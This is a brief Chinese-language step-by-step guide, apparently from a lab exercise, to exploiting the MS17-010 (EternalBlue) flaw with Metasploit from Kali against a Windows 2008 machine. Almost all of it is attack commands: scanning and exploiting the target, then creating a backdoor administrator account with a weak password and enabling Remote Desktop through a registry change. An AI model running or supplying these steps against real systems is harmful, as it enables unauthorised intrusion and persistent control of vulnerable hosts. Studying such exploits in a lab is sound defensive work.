1
攻击机 kali 172.xx.xx.72
目标机 172.xx.xx.99
2
kali 命令行 启动 MSF 框架
msfconsole
3
搜索ms17-010模块代码
search ms17_010
auxiliary/scanner/smb/smb_ms17_010 是永恒之蓝扫描模块,
exploit/windows/smb/ms17_010_eternalblue 是永恒之蓝攻击模块
4
使用扫描模块扫描目标机 172.xx.xx.99
use auxiliary/scanner/smb/smb_ms17_010
set RHOST 172.xx.xx.99
run
存在注入就会提示
5
使用攻击模块攻击 目标机 172.xx.xx.99
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 172.xx.xx.99
exploit
成功注入,即进入目标机命令行,随意执行
6
漏洞利用
创建新用户admin net user admin 123456 /add
将用户admin添加至管理员组 net localgroup administrators admin /add
开启远程桌面功能 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
kali 远程桌面连接Win2008